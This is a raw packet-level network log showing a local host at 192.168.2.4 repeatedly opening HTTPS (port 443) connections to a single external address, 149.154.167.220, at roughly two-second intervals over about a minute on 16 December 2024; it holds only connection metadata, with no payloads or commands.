Dec 16, 2024 14:15:25.463192940 CET	49815	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:25.463201046 CET	443	49815	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:26.139800072 CET	443	49815	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:26.139981031 CET	443	49815	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:26.140115976 CET	49815	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:26.140428066 CET	49815	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:26.143026114 CET	49821	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:26.143081903 CET	443	49821	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:26.143285990 CET	49821	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:26.143596888 CET	49821	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:26.143634081 CET	443	49821	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:27.514748096 CET	443	49821	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:27.517211914 CET	49821	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:27.517286062 CET	443	49821	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:27.517388105 CET	49821	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:27.517405033 CET	443	49821	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:28.174241066 CET	443	49821	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:28.174449921 CET	443	49821	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:28.174537897 CET	49821	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:28.175075054 CET	49821	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:28.182846069 CET	49824	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:28.182908058 CET	443	49824	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:28.183052063 CET	49824	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:28.183429003 CET	49824	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:28.183449030 CET	443	49824	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:29.555907965 CET	443	49824	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:29.558180094 CET	49824	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:29.558289051 CET	443	49824	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:29.558360100 CET	49824	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:29.558374882 CET	443	49824	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:30.140887022 CET	443	49824	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:30.141103983 CET	443	49824	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:30.141215086 CET	49824	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:30.141658068 CET	49824	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:30.145405054 CET	49829	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:30.145457029 CET	443	49829	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:30.145653963 CET	49829	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:30.145900011 CET	49829	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:30.145911932 CET	443	49829	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:31.511059046 CET	443	49829	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:31.516468048 CET	49829	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:31.516483068 CET	443	49829	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:31.516563892 CET	49829	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:31.516567945 CET	443	49829	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:32.090271950 CET	443	49829	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:32.090531111 CET	443	49829	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:32.090729952 CET	49829	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:32.091043949 CET	49829	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:32.094126940 CET	49835	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:32.094218969 CET	443	49835	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:32.094310999 CET	49835	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:32.094501972 CET	49835	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:32.094537973 CET	443	49835	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:33.462622881 CET	443	49835	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:33.464248896 CET	49835	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:33.464277029 CET	443	49835	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:33.464376926 CET	49835	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:33.464384079 CET	443	49835	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:34.276016951 CET	443	49835	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:34.276096106 CET	443	49835	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:34.276175022 CET	49835	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:34.276681900 CET	49835	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:34.280544996 CET	49841	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:34.280587912 CET	443	49841	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:34.280668974 CET	49841	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:34.280980110 CET	49841	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:34.280996084 CET	443	49841	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:35.647676945 CET	443	49841	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:35.649986029 CET	49841	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:35.650021076 CET	443	49841	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:35.650094986 CET	49841	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:35.650099993 CET	443	49841	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:36.193346024 CET	443	49841	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:36.193548918 CET	443	49841	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:36.194138050 CET	49841	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:36.194535017 CET	49841	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:36.198847055 CET	49847	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:36.198895931 CET	443	49847	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:36.199057102 CET	49847	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:36.199423075 CET	49847	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:36.199438095 CET	443	49847	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:37.570210934 CET	443	49847	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:37.572494030 CET	49847	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:37.572565079 CET	443	49847	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:37.572664976 CET	49847	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:37.572685003 CET	443	49847	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:38.130121946 CET	443	49847	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:38.130203009 CET	443	49847	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:38.130383015 CET	49847	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:38.130973101 CET	49847	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:38.134993076 CET	49853	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:38.135035038 CET	443	49853	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:38.135200977 CET	49853	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:38.135726929 CET	49853	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:38.135749102 CET	443	49853	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:39.497097969 CET	443	49853	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:39.502784967 CET	49853	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:39.502824068 CET	443	49853	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:39.503020048 CET	49853	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:39.503029108 CET	443	49853	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:40.049539089 CET	443	49853	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:40.049743891 CET	443	49853	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:40.049839973 CET	49853	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:40.050339937 CET	49853	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:40.054164886 CET	49859	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:40.054215908 CET	443	49859	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:40.054279089 CET	49859	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:40.054579020 CET	49859	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:40.054590940 CET	443	49859	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:41.430926085 CET	443	49859	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:41.433577061 CET	49859	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:41.433593035 CET	443	49859	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:41.435811043 CET	49859	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:41.435816050 CET	443	49859	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:41.992816925 CET	443	49859	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:41.993016958 CET	443	49859	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:41.993083954 CET	49859	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:41.993701935 CET	49859	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:41.998600006 CET	49864	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:41.998709917 CET	443	49864	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:41.998884916 CET	49864	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:41.999373913 CET	49864	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:41.999423027 CET	443	49864	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:43.397728920 CET	443	49864	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:43.408082008 CET	49864	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:43.408169985 CET	443	49864	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:43.408262968 CET	49864	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:43.408284903 CET	443	49864	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:44.303402901 CET	443	49864	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:44.305587053 CET	443	49864	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:44.305733919 CET	49864	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:44.306220055 CET	49864	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:44.309583902 CET	49871	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:44.309628963 CET	443	49871	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:44.309748888 CET	49871	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:44.310081959 CET	49871	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:44.310097933 CET	443	49871	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:45.677608013 CET	443	49871	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:45.680490971 CET	49871	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:45.680526018 CET	443	49871	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:45.680592060 CET	49871	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:45.680600882 CET	443	49871	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:46.307384014 CET	443	49871	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:46.307492018 CET	443	49871	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:46.307697058 CET	49871	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:46.307974100 CET	49871	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:46.311382055 CET	49876	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:46.311414003 CET	443	49876	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:46.311476946 CET	49876	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:46.311744928 CET	49876	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:46.311758041 CET	443	49876	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:47.675693989 CET	443	49876	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:47.682549000 CET	49876	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:47.682576895 CET	443	49876	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:47.682642937 CET	49876	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:47.682651997 CET	443	49876	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:48.329469919 CET	443	49876	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:48.331569910 CET	443	49876	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:48.331624985 CET	49876	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:48.332014084 CET	49876	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:48.335773945 CET	49882	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:48.335822105 CET	443	49882	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:48.336544037 CET	49882	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:48.336772919 CET	49882	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:48.336791039 CET	443	49882	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:49.701570034 CET	443	49882	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:49.703229904 CET	49882	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:49.703254938 CET	443	49882	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:49.703352928 CET	49882	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:49.703363895 CET	443	49882	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:50.369771957 CET	443	49882	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:50.370605946 CET	443	49882	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:50.370676994 CET	49882	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:50.371296883 CET	49882	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:50.374751091 CET	49888	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:50.374799013 CET	443	49888	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:50.374900103 CET	49888	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:50.375176907 CET	49888	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:50.375186920 CET	443	49888	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:51.771719933 CET	443	49888	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:51.773523092 CET	49888	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:51.773552895 CET	443	49888	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:51.773616076 CET	49888	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:51.773627043 CET	443	49888	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:52.391688108 CET	443	49888	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:52.391783953 CET	443	49888	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:52.392038107 CET	49888	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:52.392592907 CET	49888	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:52.396528006 CET	49894	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:52.396586895 CET	443	49894	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:52.400670052 CET	49894	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:52.404539108 CET	49894	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:52.404567957 CET	443	49894	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:53.767287016 CET	443	49894	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:53.769251108 CET	49894	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:53.769283056 CET	443	49894	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:53.769336939 CET	49894	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:53.769345999 CET	443	49894	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:54.340770960 CET	443	49894	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:54.340848923 CET	443	49894	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:54.340926886 CET	49894	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:54.343873024 CET	49894	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:54.344512939 CET	49899	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:54.344542980 CET	443	49899	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:54.345705032 CET	49899	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:54.347378016 CET	49899	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:54.347388983 CET	443	49899	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:55.707596064 CET	443	49899	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:55.710069895 CET	49899	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:55.710087061 CET	443	49899	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:55.710141897 CET	49899	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:55.710150003 CET	443	49899	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:56.285286903 CET	443	49899	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:56.285373926 CET	443	49899	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:56.286885023 CET	49899	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:56.287461042 CET	49899	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:56.290608883 CET	49902	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:56.290667057 CET	443	49902	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:56.290823936 CET	49902	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:56.291131973 CET	49902	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:56.291141987 CET	443	49902	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:57.682926893 CET	443	49902	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:57.685214043 CET	49902	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:57.685237885 CET	443	49902	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:57.685312033 CET	49902	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:57.685322046 CET	443	49902	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:58.248574018 CET	443	49902	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:58.248666048 CET	443	49902	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:58.248991013 CET	49902	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:58.252522945 CET	49908	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:58.252527952 CET	49902	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:58.252588987 CET	443	49908	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:58.252780914 CET	49908	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:58.253048897 CET	49908	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:58.253066063 CET	443	49908	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:59.616291046 CET	443	49908	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:59.625669003 CET	49908	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:59.625689983 CET	443	49908	149.154.167.220	192.168.2.4
Dec 16, 2024 14:15:59.625737906 CET	49908	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:15:59.625746965 CET	443	49908	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:00.169001102 CET	443	49908	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:00.169101000 CET	443	49908	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:00.169212103 CET	49908	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:00.169703007 CET	49908	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:00.173265934 CET	49914	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:00.173304081 CET	443	49914	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:00.173409939 CET	49914	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:00.173788071 CET	49914	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:00.173801899 CET	443	49914	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:01.534140110 CET	443	49914	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:01.536294937 CET	49914	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:01.536323071 CET	443	49914	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:01.536391020 CET	49914	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:01.536400080 CET	443	49914	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:02.112802029 CET	443	49914	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:02.112900972 CET	443	49914	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:02.113046885 CET	49914	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:02.121535063 CET	49914	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:02.128216028 CET	49920	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:02.128261089 CET	443	49920	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:02.128339052 CET	49920	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:02.132716894 CET	49920	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:02.132742882 CET	443	49920	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:03.505660057 CET	443	49920	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:03.507941961 CET	49920	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:03.507957935 CET	443	49920	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:03.508064032 CET	49920	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:03.508069038 CET	443	49920	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:04.180563927 CET	443	49920	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:04.180650949 CET	443	49920	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:04.181555033 CET	49920	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:04.181921959 CET	49920	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:04.186126947 CET	49926	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:04.186161995 CET	443	49926	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:04.186335087 CET	49926	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:04.186547995 CET	49926	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:04.186568022 CET	443	49926	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:05.546591043 CET	443	49926	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:05.549309015 CET	49926	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:05.549329996 CET	443	49926	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:05.550143957 CET	49926	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:05.550153017 CET	443	49926	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:06.263680935 CET	443	49926	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:06.263761997 CET	443	49926	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:06.265245914 CET	49926	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:06.265245914 CET	49926	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:06.268970966 CET	49930	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:06.269012928 CET	443	49930	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:06.269097090 CET	49930	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:06.269421101 CET	49930	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:06.269433975 CET	443	49930	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:07.645561934 CET	443	49930	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:07.647979975 CET	49930	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:07.648001909 CET	443	49930	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:07.648087025 CET	49930	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:07.648092031 CET	443	49930	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:08.292898893 CET	443	49930	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:08.292980909 CET	443	49930	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:08.293200970 CET	49930	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:08.295286894 CET	49930	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:08.296833038 CET	49936	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:08.296869993 CET	443	49936	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:08.297072887 CET	49936	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:08.297837019 CET	49936	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:08.297867060 CET	443	49936	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:09.673614025 CET	443	49936	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:09.724531889 CET	49936	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:09.731187105 CET	49936	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:09.731211901 CET	443	49936	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:09.731544971 CET	49936	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:09.731551886 CET	443	49936	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:10.291430950 CET	443	49936	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:10.291521072 CET	443	49936	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:10.291570902 CET	49936	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:10.292429924 CET	49936	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:10.297131062 CET	49941	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:10.297184944 CET	443	49941	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:10.297385931 CET	49941	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:10.297842026 CET	49941	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:10.297858000 CET	443	49941	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:11.676738977 CET	443	49941	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:11.678709030 CET	49941	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:11.678742886 CET	443	49941	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:11.678881884 CET	49941	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:11.678888083 CET	443	49941	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:12.313832045 CET	443	49941	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:12.313921928 CET	443	49941	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:12.314152956 CET	49941	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:12.341866970 CET	49941	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:12.432296991 CET	49947	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:12.432342052 CET	443	49947	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:12.432722092 CET	49947	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:12.434087992 CET	49947	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:12.434106112 CET	443	49947	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:13.801640034 CET	443	49947	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:13.803997993 CET	49947	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:13.804018021 CET	443	49947	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:13.804081917 CET	49947	443	192.168.2.4	149.154.167.220
Dec 16, 2024 14:16:13.804086924 CET	443	49947	149.154.167.220	192.168.2.4
Dec 16, 2024 14:16:14.393747091 CET	443	49947	149.154.167.220	192.168.2.4
